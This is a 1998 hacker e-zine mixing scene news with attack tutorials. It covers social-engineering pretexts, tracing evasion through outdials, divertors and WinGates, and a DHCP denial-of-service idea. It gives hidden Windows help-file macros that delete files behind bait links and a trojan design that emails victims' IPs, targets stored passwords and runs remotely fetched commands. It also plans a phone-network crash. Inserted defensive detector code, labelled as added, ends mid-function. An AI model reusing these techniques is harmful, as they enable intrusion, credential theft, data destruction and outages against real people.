Computer Academic Underground
Electronic Magazine
Volume 3, Number 6
0615.98

##############################################################################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
==============================================================================
------------------------------------------------------------------------------
..............................................................................

Table of Contents

  Foreword

  General
    . Member Listing
    . Freedom of Information Act                 ultra violet
    . Social Engineering                         Bandman

  Hacking
    . Hiding Your Footprints                     I)ruid
    . DHCP Denial of Service                     protocol
    . Fun With Windows Help Files                LoCoPuff
    . Exploit of the Month                       I)ruid
    . Netcat Trojan Update                       protocol

  Phreaking
    . Crashing The Phone Systems (Theory)        Ellis D

  Local Scene
    . Bulletin Board Systems
    . 2600 Meetings
    . Events

  Closing

##############################################################################

Foreword

Welcome to the 2 year Anniversary issue! This E-Zine, #20, marks two years of the CAU E-Zine. Normally, a 2 year anniversary for a monthly publication would be issue number 25; however, due to some hard drive crashes and lack of contributors in the Zine's past, a few months along the line were skipped. However, starting this month, a new numbering scheme will go into effect. Rather than this being CAU E-Zine #20, this issue will be known as Volume 3, Number 6, and the file archives will be renamed accordingly. This provides for one volume per year, issues 1 - 12. Anyway, Happy Birthday CAU E-Zine!

All right, I didn't explain it too well in last month's zine, so I'll attempt to do so now. The 'Local Scene' section was added to the zine to specifically target the 817/214/972 area codes, and to keep up to date information on local information such as BBS's, the 2600 meetings, etc. Right now, all the BBS's that I know of are listed. In the future, as more H/P oriented BBS's pop up or are found, this list will be cut to only include BBS's that relate to our community. The reason we have this new section in the zine is that the general scene in Dallas/Fort Worth is dying in my opinion, and this is just one of many attempts to keep it alive.

Another attempt at keeping it alive is that I have set up the Paranor BBS once again, available through telnet and soon to be available via dialup as well. The general idea is to give the people in D/FW that choose to involve themselves in the H/P scene a sense of community. That is one thing that BBS's have, and the Net lacks. A sense of local community. This is why BBS's will never completely die.

There's nothing like the feeling you get when you get home one day and check your wardialing logs and find a new dialup, and when you call it it's some underground type BBS you've never heard of or seen before. These are people in YOUR area, talking about stuff happening in YOUR area. Not a bunch of random people in an IRC channel talking about a Hacker Con out in some random state that's at least 6 hours away from you, or a phone system in Brazil that you'll probably never have access to or use anyway.

This is also the reason we have started including local prefix scans in the zine again. There's nothing like the feeling you get from actually DIALING UP to a system somewhere in YOUR area, instead of telnetting to it somewhere across the net. It's a feeling many of us haven't felt for quite a long time. It's something that we all need to feel again.

Believe it or not, I believe that the Internet is one of the hindrances of 'old-school hacking.' The scene will never again be like it was, simply because of the fact that most people would rather jump on the net, collect their 'h4xz0r skr1ptz' and randomly blow stuff up, rather than learning about systems, how they work, and being able to dial up to a system and play with it. This saddens me, and almost makes me lose hope.

I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Member Listing
(In the order in which they were brought into the CAU)

Handle              IRC Nick      E-Mail
--------------------------------------------------------------
I)ruid              I}ruid        druid@caughq.org
ultra violet        uv_           uv@caughq.org
Crimson Assassin    Crim          crimson@caughq.org
Fizban              Fizban^       fizban@caughq.org
Sublime             _sublime_     sublime@caughq.org
int3l               int3l         int3l@caughq.org
MajestiX            maJesTix      majestix@caughq.org
--------------------------------------------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Freedom of Information Act

This little article was inspired by file 12 of 14 issue 42 vol 4 of Phrack, by Vince Niel. His article covered some basics about using the FOIA to yer advantage. When I saw this I considered making a record request to some of yer basic government agencies (ie: fbi, etc). But I wasn't too sure about the specifics, so to the local public library I went.

FOIA- freedom of information act: provides access to all federal agency records, except so called sensitive parts. In which case they must inform you why they denied the specific information. If records requested contain:

  1) classified national defence and foreign relations info.
  2) internal agency rules and practices.
  3) info that is prohibited to be disclosed by another law.
  4) trade secrets- confidential business reports.
  5) inter-agency or intra-agency communication which are subject to legal privileges.
  6) info concerning personal matters. (my guess masturbation, sex etc)
  7) certain info collected for law enforcement.
  8) info relating to supervision of financial institutions.
  9) geological info on wells. (sorry kids I haven't a clue???)
  + 3 exclusions - which means, we don't know these remaining reasons to withhold records. So if they don't wanna show you something they aren't going to :)

*note* all these don't mean they won't give you that info, just that they are not legally bound to do so.

  - you can request records on ANYONE, not just yourself.
  - applies to all records of federal agencies.
  - You can also request information about state records by writing to the state's attorney general.
  - You can also request company info from the appropriate agency. (ie: Consumer Product Safety Commission)

*note* keep requests short and specific.

some record request notes:

  - mark on both the letter + envelope "Freedom of Information Act Request".
  - try to be specific on records requested. It would be better to say all records pertaining to XXXXX in the last year, than all records pertaining to XXXXX.
  - they (meaning the agency at hand) like to see times, places, events, subjects, and/or any other relevant info regarding request.
  - I don't know for sure, but somewhere I read they don't give your request the time of day unless it is notarized. To do this just go to yer local bank and ask to get the document notarized.
  - keep a copy of the request just in case. If you don't receive a response within a certain period (usually 10 working days) of time resend the request with a copy of the first stapled to it.

Types of Records:
  Medical Financial Benefit Law Enforcement Personnel Files

COST- for non-commercial they charge for time + copies. (time is determined by salary of personnel involved. hmm?) Generally it's $.10/copy.
For Non-commercial requests, agencies will not charge for the first two hours of processing, or the first 100 pages. Agencies will also not charge if costs are minimal. Gotta wonder what some multi-billion $ agencies would consider 'minimal'.

If requests take more resources than what is provided freely, there is a section on the forms to state how much you are willing to spend on this request. If your request is more than what is provided freely you will be sent a bill. If the processing costs more than the stated amount you wish to pay, then the agency will mail you a notice.

NOTE- if fees are charged you may request a waiver of costs if you can prove that the records will contribute to the public's understanding of operations or activities of the government. (ie: be a little creative, school report :/ )

The Privacy Act-1974

Passed to control information collected by federal government and how it is used!

Powers Granted by act:

  1) the right to see records of oneself.
  2) right to amend that record if it is inaccurate, irrelevant, untimely, or incomplete
  3) the right to sue the government for violations of the state, including permitting others to see your records, unless specifically permitted by the Act.

NOTE- also prohibits the agency from maintaining info describing how an individual exercises his/her First Amendment Rights.

TIME SAVER- before making a full record request, you are entitled to make a formal request of whether or not the agency has ANY info on you. (ie: Yo bitch yall know shyt about me? they must tell you.)

  - applies to "system of records" which is a system of INDIVIDUAL's records.
  - might be a good idea to include a photocopy of any valid forms of ID.
  - under privacy act the agency is NOT required to reply within any set amount of time.

COST- Under the Privacy Act an agency can charge ONLY for cost of copying records, not time spent processing request

REFERENCE

  US GOVT manual                     Avail: public libs
  CFR-Code of Federal Regulations    Avail: public libs
  URL: http://www.usjod.gov/

FORMS: Sorry to say between the time I gathered this info and the time I have typed it all out, I have lost my copies of the forms. The reference to the phrack issue has a crude version of one. If anyone has the updated version of the request form I'd appreciate a copy.

ultra violet

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Social Engineering

Ok, as if you haven't already guessed, this article is on social engineering. Another, more crude way of saying this is BS-ing. If you don't know what THAT is, turn off your computer, and go watch some more Barney. In order to engineer effectively, you have to feel comfortable talking to people, or at least make it SEEM like you are comfortable. If you are nervous at all, the person being engineered will pick up on it, and become suspicious. This is a bad thing. People don't give information when they are suspicious. Which is, of course, your primary goal in social engineering. To get information from a person that would normally not give it to you, by pretending to be someone else, like a boss, or a colleague from another department. In this article I will give some pointers, but I can't fully instruct how to do this, as a large portion of it is in the engineer.

First off, when you want information from a person, what do you do? It depends on the person you need the information from, right? Well, it's the same with social engineering. You have to consider who you are going to talk to, their job, their status, and how bored they are. For example, the more bored, and underpaid a person, the more willing to give up information they are. Someone of this type would be a janitor. Regardless of what you have heard, janitors are not always dumb, as they DO have to know everything about the buildings that they work in. They are also VERY bored, and VERY underpaid. This makes them a good person to pump for information. That is the target.

You also have to think about the person that you are pretending to be. It helps to be a superior, or an extreme underling. A superior is just a person that is a higher rank than the target. It shouldn't be their boss, but a boss from another department. It is also good to be an extreme underling, because then you can appeal to the target's sense of superiority. Remember that people like to feel good. Dealing with people that are dumber than they are makes them feel good. I'd say, probably the best person to be would have to be Joe Blow from accounting, for these reasons:

  A. People from accounting have no idea how to use a computer, and everyone knows it.
  B. No one knows ANYONE from accounting.

Other than Joe, you could be a temp who doesn't know anything about the computer, but was asked to do something on it, or a confused secretary. Above all, you have to pretend to be incompetent, because it is expected. Most people assume that everyone at their place of work is incompetent except them, so you won't arouse any suspicions by being dumb.

The other big trick to social engineering is remembering that people work on assumptions. One large assumption, and mostly true, is that their bosses do not like to be bothered over trivial things. This is why the target is afraid of bothering him. It is better to assume that the engineer is actually who he says that he is than to irritate the boss. One other assumption is that even people who are bored don't have time to chase a phantom employee around the office. If they do, their boss will find out, and become irritated that they are using their time ineffectively.

These are just some of the key points to good engineering. The more you practice, the better you will become. I like to practice a lot, even when I really don't need the information. It's just fun to try to see what info you can get. You will be surprised at what kinds of information people will give away. And remember, if people start asking questions, just hang up the phone. It is much safer than trying to talk your way out of it.

Neither I nor the publishers of this e-zine are responsible for anything stupid that you might do.

Bandman

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Hiding Your Footprints

This article intends to generally educate people that don't know about two major resources that everyone should have at least minimal access to, and a few techniques in using these resources to decently cover your tracks when connecting to a dial up computer system or network, or any computer system directly connected to the Internet.

Outdial - n. (owt-die-all) - any modem or PBX phone system directly connected to one or more computers on a network, allowing outgoing phone access.

Outdials normally come in two flavors: global outdials, and local outdials. First the latter... A local outdial is exactly what it says, it's an outdial local to that area code, not allowing long distance calls. A global outdial will allow you to call anywhere in the world. You also have regional outdials, which are not seen very often, allowing calls to say, long distance, but not international calls. These are pretty rare, so I just group them in with global outdials, just that they are limited in the dialing area.

Now, what are outdials useful for? If you don't have at least ONE idea in your head by this point, please stop reading this and go do something useful with your time, like learning a trade such as basket weaving, because you're gonna need to make a living somehow...

Let's say you have a dialup to a system, but it's not in your area, and for some reason or another you can't dial long distance. However you can dial up to the Internet, or you have access to some other regional network. If that network has outdials, or you have access to outdials on the Internet, you can connect to these outdials and dialup to that non-local indial you have that you just can't seem to dial from where you are (can we say the word 'dial' one more time?). Obviously you're going to need an outdial in the target area, or a global outdial to reach the target system.

Most people don't care to bother finding or hacking access to outdials much anymore because as I stated in the Foreword of this month's zine, too many people only do Internet related stuff. Nobody dials up to systems anymore, they just find ones connected to the Internet. But let's say you actually wanted to find one...

Where to find outdials:

Ok, believe it or not, this is one of the easier things to do. Many servers that accept credit cards have... guess what? Credit card modems used to verify charges being made over the web. Now isn't that special. All you need is access to one of these servers and enough access to use one of the modems. Boom!, you have an outdial. Also, many government servers and universities have outdials, but these are usually a little hidden, and take some work to find.

Ok, so let's assume you find yourself a couple of outdials, local, global, whatever. Using an outdial is sometimes a little tricky. If the machine that has the modem connected to it is say, a default linux install, you can probably use the pretty little minicom terminal program to interface with the modem. If not, try dip, tip, or some other serial port related program. If you don't know what dip and tip are, go find some man pages, and I suggest you read. A lot. And if you can't figure out how to tell if a machine has a modem connected to it, go read a FAQ or HOWTO about hooking your modem up to your UNIX machine (US Robotics's homepage has one, although now it's on 3-Com's homepage), because I'm not going to go into it here.

Let's get to the next part of this article, before I get too far into the whole modem/outdial thing.

Divertor - n. (dive-err-tor) - An indial or PBX allowing outgoing phone access.

Divertors are fun. Divertors are useful. Everyone should have at LEAST one available to them at all times. Ok, obviously, divertors are used to bounce, or 'divert' telephone calls, making them harder to trace, and much more anonymous than a normal phone call would be. Most divertors you simply dial into, and they provide you with a tone requiring an access code, or they just simply give you a dialtone. In any case, the point is, you end up at a dialtone. What does this mean kiddies? You guessed it, that means you can dial out once again.

One simple technique that is not really diverting, is having the "0" operator dial a call for you. You dial 0, say "Please dial 555-1234 for me", and the Operator will dial 555-1234 for you. This is an easy way to get around caller id, in case the number is not accepting calls from anonymous (*67) calls. Another diverting technique is to dial 1.800.CALL.ATT and use a credit card to have them dial another number for you. All of this has been covered in previous issues of the CAU E-Zine so I'll leave it at that.

There are online equivalents to divertors as well, such as WinGate servers and datapipes. Datapipes are simply port redirectors for piping data from a port on server X.X.X.X to a port on server Y.Y.Y.Y. Therefore if you telnet to a datapiped port on server X.X.X.X, it will send you to another port on server Y.Y.Y.Y. This makes for some nifty traceback dilemmas. WinGate servers are basically the same thing, but allow you to define where it sends you to. Telnet to a WinGate server on port 23, and it will send you to the destination of your choice. Included in this month's zine is a simple piece of C code which allows you to set up your own datapipes on systems that you have access to... and remember, you don't need root to bind to ports above 1024...

[ EDITOR'S NOTE: This source code is contained in the external file 'datapipe.c'. ]

Now, how can all of this be used you ask? If you're actually asking that, once again, stop reading this and go hit yourself in the head with a large steel monkey wrench.

Let's have a scenario: Let's say you have this 'n33t0 l33t0 d14lup' that someone on IRC gave you, and it's the dialup to.. . .. the Pentagon. Or something of equal proportions and geometric perfectness. All right, obviously you don't want to dial up directly to this system. If you do, shoot yourself now, it'll save you a LOT of prison time.

Okay, here's what you do: First, you Op divert to AT&T, hiding your caller ID info. AT&T doesn't get your caller ID info, so they ask you for the phone # you're calling from. Give them any # you want to be coming from, and that will show up on the next Caller ID box that receives the AT&T call. Ok, so you card a call from AT&T to an internet service provider, and log in using a hacked ppp account. Now you have a couple of options: You can either open a web browser, go to one of those many pages that have telnet java applets and such on them, and if you can log into the system that it telnets to (a little hacking on your part may be required at this point), guess what? You have a shell. Or hell, you could just telnet to it, same thing considering it's all coming from your current IP. The web thing just tends to impress visual people. Anyhow, you're at a shell, and you can telnet through a couple of WinGate servers or datapipes (data pipes are useful for this in that they can all be set up before hand to bounce you through multiple servers with one telnet command) and eventually end up at... one of your outdials. Now, with this outdial, you can either dial directly to your geometrically perfect target, or you can repeat the entire process by dialing up to another internet account. Eventually, you reach your target.

There is a speed issue to all of this of course... If you go through too many slowly connected computers or slow outdials, your connection speed IS going to suffer. I consider this issue simply to be a quality issue in relation to the individual outdials, datapipes, and divertors that you have access to.

Now, if you don't see the benefits of this, email me your name and address so that I can personally come to your house and beat a clue into your skull. For one, for someone to trace you, they would be tracing a phone call from your target system backwards. This ends up at the last outdial you used. From there, they would have to trace your connection on the Internet back to the last indial you used, and so forth. Switching from a phone trace to a net trace takes time, usually because access to the system that has the outdial is needed to trace that connection. Also, most small companies and non-government agencies do not have the time or money to trace you in and out of the Internet. The more you have them switch between phone traces and net traces, the harder it is going to be for them to find you. This makes it relatively safe to connect to dialups, given you do this properly. And if you are REALLY paranoid, get a laptop and go to the park with an acoustic coupler and use a payphone.

Anyhow, I hope by this point you get the idea, and see the benefits of both divertors (phone and internet alike), as well as outdials and indials, and how they can be used to hide your tracks. That's my ranting for this month... Have fun.

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

DHCP Denial of Service

Well hello once again my faithful readers.
I thought I'd just babble for a paragraph or two about an idea I had on a new denial of service method. I know you're thinking "oh boy that's just what the world needs... another way to bump somebody off-line". Well fear not true believer that's not the whole story. This is a way of keeping a DHCP server from setting up new clients. Kinda the way I was thinking this software would be used would be if say an organization was ticking you off and you wanted to annoy them just set this software up and walk away.

Anyway here's the hole as I see it: client wakes up says "hey I ain't got no ip better get one, I'll shout on 255.255.255.255 and see who answers" then the DHCP server responds with "here is one from my pool 1.2.3.whatever, oh and here is your DNS and router and so forth". This is very trusting on both the server and client's part so there are several different ways to annoy people:

  1. Take up all ip's in pool by making repeated requests for an ip. (Note before you go and hack samba methinks this would require a way of forging mac addresses).
  2. Send the client a special ip and a compromised host as the router and then forward all requests to real router. (this should be a way of forcing traffic thru your compromised host for various reasons)
  3. Or just feed it bad info and watch the victim squirm. (do not try this at work remember we are trained professionals)

A couple of thoughts about the software:

  1. Windows version (should be silent and automatic)
  2. Could this even be attempted remotely? My gut says no because of the mac addresses which are not part of the tcp/ip layer and are not routed. I could be wrong tho, so prove it.

Please feel free to tell me how I have it all wrong or what other mischief could be done.

Remember that just because you have a cleaver doesn't make you a butcher.
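
A defender's view of the three abuses listed above, as an added example that is not part of the original article: a small detector that reads DHCP events and flags a burst of new client MACs on one switch port (item 1) and offers that come from an unauthorized server or advertise an unexpected router (items 2 and 3). The log format, addresses, port names and thresholds are all constructed assumptions.

```python
"""Detect DHCP pool exhaustion and rogue-server offers in a DHCP event log.

Added example. The log format, addresses, switch-port names and thresholds
are constructed for illustration; adapt parse_line() to your own sensor.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed site policy (hypothetical values).
AUTHORIZED_SERVERS = {"10.0.0.2"}
EXPECTED_ROUTERS = {"10.0.0.1"}
MAX_MACS_PER_PORT = 5               # distinct client MACs per port per window
WINDOW = timedelta(seconds=60)

# Constructed sample input: one port cycling through MACs, one normal client,
# one legitimate offer, one offer from an unknown server, one junk line.
SAMPLE_LOG = [
    f"1998-06-15T10:00:0{i} DISCOVER mac=02:00:00:00:00:0{i} port=sw1/7"
    for i in range(1, 8)
] + [
    "1998-06-15T10:00:10 DISCOVER mac=00:a0:c9:11:22:33 port=sw1/3",
    "1998-06-15T10:00:11 OFFER server=10.0.0.2 ip=10.0.0.50 "
    "router=10.0.0.1 mac=00:a0:c9:11:22:33",
    "1998-06-15T10:00:11 OFFER server=10.0.0.99 ip=10.0.0.200 "
    "router=10.0.0.99 mac=00:a0:c9:11:22:33",
    "garbage line",
]


def parse_line(line):
    """Parse 'TIMESTAMP TYPE key=value ...' into a dict; None if malformed."""
    parts = line.split()
    if len(parts) < 2:
        return None
    try:
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
    except ValueError:
        return None
    event = {"ts": ts, "type": parts[1].upper()}
    for field in parts[2:]:
        key, sep, value = field.partition("=")
        if sep:
            event[key] = value.lower()
    return event


def detect(lines):
    """Return a list of (kind, subject, detail) findings, in log order."""
    findings = []
    seen = defaultdict(list)        # port -> [(timestamp, mac)] inside WINDOW
    flagged_ports = set()           # report each port once
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue                # skip lines the parser cannot read
        if ev["type"] == "DISCOVER" and "mac" in ev and "port" in ev:
            port = ev["port"]
            recent = [(t, m) for t, m in seen[port] if ev["ts"] - t <= WINDOW]
            recent.append((ev["ts"], ev["mac"]))
            seen[port] = recent
            macs = {m for _, m in recent}
            # One access port normally has one or two clients; many distinct
            # MACs in a short window suggests forged addresses draining the pool.
            if len(macs) > MAX_MACS_PER_PORT and port not in flagged_ports:
                flagged_ports.add(port)
                findings.append(("pool-exhaustion", port, len(macs)))
        elif ev["type"] == "OFFER":
            server, router = ev.get("server"), ev.get("router")
            if server not in AUTHORIZED_SERVERS:
                # Any reply from an unlisted server is suspect, whatever it offers.
                findings.append(("rogue-server", server, router))
            elif router not in EXPECTED_ROUTERS:
                findings.append(("unexpected-router", server, router))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

On a switched network the same two policies can be enforced in-line with DHCP snooping (only trusted ports may send server replies) and a per-port limit on learned MAC addresses.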
Protocol (the way things work) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Fun With Windows Help Files Let's face it, mostly everyone who runs Windows products trust help files... The common user trusts help files... I sometimes trust help files... Would it ever occur to you that if you clicked on a link in a help file that something BAD could happen ? *EvilGrinAndLaff* Okay, so you have a program called "winhlp32.exe" Sweet and simple. You send it a *.hlp file and it runs that help file. There is a Macro that allows you to execute files within the help file. That's great! A nice easy way for Microsoft to run other programs to hold the hands of non-technical people via a help file. But this "ease of use" can also be used to do other things. Function Layout: -------------------------------------------------------------------------- ExecFile(program[, arguments[, display-state[, topic-ID]]]) program The name of the program you want to run arguments Command-line parameters your program will use display-state Indicates HOW the program's window is shown. SW_HIDE - Hidden <---- This is the one that is important here ! SW_MINIMIZE - Minimized SW_RESTORE - I dunno . . don't care SW_SHOW - Shows (visible) SW_SHOWMAXIMIZED - Shows Maxed SW_SHOWMINIMIZED - Show Minimized SW_SHOWMINOACTIVE - I dunno . . . SW_SHOWNA - I dunno . . . SW_SHOWNOACTIVATE - I dunno . . . topic-ID Context string of Help topic to display if the program cannot run -------------------------------------------------------------------------- So, you can use the SW_HIDE flag for a few things: Run FTP and pull down a file ExecFile("ftp.exe","-s:script.scr ftp.cytware.com",SW_HIDE) Do a search for a file called "warning.txt" Run Solitare Hidden ExecFile("sol.exe","",SW_HIDE) Wait! I don't see a window... 
Check your task list (Alt-Ctrl-Del) Copy Windows temp folder to desktop ExecFile("xcopy.exe ", "c:\windows\temp\*.* c:\windows\desktop\tempcopy\*.* /y",SW_HIDE)) Check your desktop and look for a folder called "tempcopy" So... you are probably saying: "So, big deal." Well, I'm not gonna explain everything, but if you think about it, you have level of trust (people normally don't think of help files as being harmful), you have Network functions (hidden way to log into FTP and pull down a file), you have File functions (hidden way to copy, move or delete files), you have Execute functions (hidden processes), etc... Sounds like if you put those together you could make a help file for a product that could do some pretty cool stuff. For example: Click here for free download ExecFile("move.exe"," /y c:\windows\system\*.dll c:\recycled\*.*",SW_HIDE)) Get Free Porn Passwords ExecFile("xcopy.exe","c:\windows\*.* c:\windows\desktop\*.* /y",SW_HIDE)) Register Software ExecFile("deltree.exe"," /y c:\windows\desktop\*.*",SW_HIDE)) You get the idea. Anyway... but the point here is the SW_HIDE. These things can be done... INVISIBLE to the user! Enjoy ! LoCoPuff [ EDITOR'S NOTE: Example code and such is included in the external zipfile 'puffhelp.zip', which is included in the E-Zine package. ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month Allright, this exploit is a little old, and it's not much of an exploit, but it's funny as hell. This is a problem with vixie cron, which allows you to get around file quotas and hide files by uuencoding them and sticking them in your user crontab. This was posted to BugTraq a few months ago. The two bash scripts that are included in the zine tarball work enough to demonstrate the concept (backup your crontab), but with a little work, anyone could create a nice file hide and retrive utility to hide and retrieve multiple files by specifying the filename. I may work on that in the future... 
it would probably take about 10 minutes to code. But for now, have fun with the files included, named 'cron_get' and 'cron_put'. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Netcat Trojan Update An update on the [Netcat] Trojan from before: the software is now e-mailing out the victim's ip and starts automatically as well as making a serial number and sending that as well. I am working on getting some keys out of the registry and e-mailing those, as well as getting the share passwords and dial-up passwords. The only big thing I have left is getting commands from a web page to execute and a system32 beta could be out. Anyone who would like to help or has suggestions for features let me know. As it stands it goes like this: 1. Start up first time by manual means or through compromised installshield or other one-time local command run like the IE shortcut bug. 2. Create system32.reg which is a registry file that will launch system32.exe at start-up. 3. Import file, delete file. 4. Check for serial number if none randomly pick one and stick it in file either way stick in var. (will add a way to do this from a command-line option so you can change it at a later date right now tho you can send the command to delete the serial number file) 5. Get current ip and stuff in var (this will later loop until valid ip found so it will wait until the machine is online) 6. Get registry info (To Be Done, it will contain e-mail, registered name and company maybe some other stuff like ICQ # if installed and share passwords and dial-up passwords) 7. Mail everything collected (will have e-mail in system32.ini ) 8. 
Check for new commands (will look in ini for url to check, will parse for lines starting with * or serial#) Lines will look like this: * 0 dir /s This will make all machines execute this command everytime (0 means always) 64532 1 start www.caughq.org This will make the machine with serial number 64532 run druid's page on the default browser the first time it d/ls this line it then will stuff a 1 in a file and next time will execute only lines that match and have a number greater than 1 in second column. 9. Execute commands (can be anything in dos or windows) 10. Check online still and same ip? Yes email response and goto 8 else goto 4. One thing it would be nice to have would be the commands 'ps', 'kill', and 'renice'. I'd also like a cron type thing built in ex: 12:00am e-mail ip. Remember that just because you have a scalpel doesn't make you a surgeon. Protocol (the way things work) ############################################################################## Phreaking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Crashing The Phone Systems (Theory) 1. Introduction: This is my theory on how to crash the phone system based on an educated guess about the new features implemented within the newest phone system networks around the United States. Also this theory is based around the long distance carrier crash a while back. 2.The theory: The theory is to max out the phone switches with one feature that has been added to the public phone systems around the United States. Basically making a continuous loop around cities, state and even in other countries if they have this feature in their phone systems. 3.The plan: The plan is to use call forwarding to make a huge non-stopping loop. How is this you may ask yourself. This is simple. Lets say we had about 50 people (all have call forwarding on their line) in each some what major cities in the U.S. gather together to d o this. Here's how you would start. 
You get all of the people that are willing to do this into IRC and discuss
what people will do. You would have to have a number list drawn up and tell
who's going to forward their line to so-and-so's number for each person till
you hit the end of the list. The first person on the list doesn't have a
number forwarded to him and the last person on the list does not have his
number forwarded to any other number, meaning there isn't a loop, so you
forward the last person's number to the first person's number. Once you have
that done, have each person go to a pay phone and dial their number that has
been forwarded and keep on the line till the phone system has crashed. So
every phone that has been forwarded has someone calling it.

So let's just say we did a small city, so we have 50 people doing this on one
connection of the phone system. The system would have 50 numbers that have
been forwarded into a loop, then once the people start calling the lines the
connection would be forwarding 50 calls to 50 different phone numbers
indefinitely.

I am not sure if you can have more than one person call one forwarded number
or not. Let's say you can have any number of people call that line and that
we have one hundred people calling the numbers within the loop. That would be
2 people per number, putting more stress on the connection.

To do a statewide loop you would do your cities without making a loop, and
the last guy on the list for each city would have to forward to the next city
until there are only 2 people needed to make the loop, and then you would
make the loop by the means mentioned above. To do a country loop would be
almost the same as the state loop. The international loop would be the same
as the country loop.

Also make sure that you do Caller ID blocking on the line that you are
forwarding, to do a little bit of covering up. Another note would be to make
a couple of small city loops that are not part of the main loop.
Long distance calling cards can help also, by calling one and looping it
several times by just calling in again and again, then moving on to the next
calling card and repeating these steps till you come back to your first
calling card and continuing the process over again.

Also, in real life it would take more than that to crash the system. You
might want to find some people with PBX experience and have them program the
PBX to help make even more calls to the forwarded numbers, because PBX's
usually have a lot of phone lines that can be used to dial out. If you could
get enough PBXs programmed to do this task, that would help you out in
stressing the network. If you do find a PBX programmer, see if he can also
program the PBX to do the calling card looping.

4. Closing:

This is just a theory on how to crash the phone systems with one new feature
that has been added to a lot of phone systems around the U.S. Also, some
other ideas of mine were added to this theory to help out the crashing of the
phone system. This is just a theory and has not been proven to work, nor do I
want to find out, so please do not do this, and if you do, it is your
responsibility, not mine, because I do not condone illegal conduct nor
complete stupidity.

Ellis D

##############################################################################

Local Scene

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Bulletin Board Systems

In the future, we will hopefully reduce this list to Hack/Phreak oriented
BBS's ONLY, but for now, since there are so few BBS's at all, we'll just list
all of them.

------------------------------- --- --- ---- ----------------------------
System Identification           NPA.WC-.NUMS NOTES
------------------------------- --- --- ---- ----------------------------
A Non-BBS                       972.355.9889
Bare Facts                      817.284.2551 Adult Oriented
  Metro Line                    817.429.2667
Cat Killers                     817.491.3712
  Node 2                        817.491.3629
Chrysalis                       817.540.5565 Multi-Node Chat BBS
Fortress, The                   817.763.5583
Frayed Ends Of Sanity           817.297.7459
Kewl Stuff                      817.294.9094
Mystic Realms                   817.377.4440
  Metro Line                    817.784.9370
Nimbus                          817.246.3295
Nova Tech                       972.475.3833
Paranor                         817.???.???? H/P, telnet caughq.org 31337
sdf.lonestar.org                972-317-6960 Free Linux shell provider
Unicorn Valley                  817.534-0365
Violent in Public               972.494.1024 Hacker/Phreak Oriented
Virtual Village                 214.739.8328
------------------------------- --- --- ---- ----------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

2600 Meetings

First Friday of Every Month
6:00pm until 9:00pm

817 2600 Meeting                      972/214 2600 Meeting
North East Mall Food Court            Mama's Pizza
N.E. Loop 820 at                      N.E. Corner of Campbell Rd at
Bedford Euless Rd.                    Preston Rd. (North Dallas)
Hurst, Texas                          Dallas, Texas
Payphone: 817.???.????                Payphone: 972.931.3850

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Events

First Saturday Sidewalk Sale
First Saturday of Every Month
Midnight through Saturday Afternoon
Ross Avenue at Pearl St
Dallas, Texas

##############################################################################

Closing

In my opinion, this is the best zine we've had since the Christmas issue,
simply because of the fact that we had so many people contribute for once.
Hopefully we can keep this trend going.

I regret that this month we do not have a prefix scan, but due to some
technical difficulties, I have not had the resources to scan a prefix this
month... this is exactly why we need other people to contribute prefix
scans... I can't do them all myself.

Until next month...

I)ruid

##############################################################################

                    ____      ____     __    __
                   /    \    /    \   |  |  |  |
      ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                 |  |      |  |__|  | |  |  |  |
                 |  | ___  |   __   | |  |  |  |
------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                   \____/  |__|  |__|  \______/

                  Computer Academic Underground
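
Added example, not part of the original zine: the network-side counter to the forwarding ring described in 'Crashing The Phone Systems (Theory)' is to audit the forwarding table for cycles and to refuse a call once it revisits a number or uses up a hop limit. The phone numbers, the function names and the MAX_HOPS value of 5 are assumptions made for this sketch.

```python
# Added example: audit call forwarding for loops and enforce a hop limit.
MAX_HOPS = 5  # assumed policy value, not a figure from the article

# Constructed sample table (number -> forward target): a 4-line ring like the
# article's list with the last line forwarded to the first, one line feeding
# the ring, and one ordinary forward that terminates.
SAMPLE = {
    "555-0101": "555-0102",
    "555-0102": "555-0103",
    "555-0103": "555-0104",
    "555-0104": "555-0101",
    "555-0150": "555-0103",
    "555-0160": "555-0199",
}


def find_loops(forwards):
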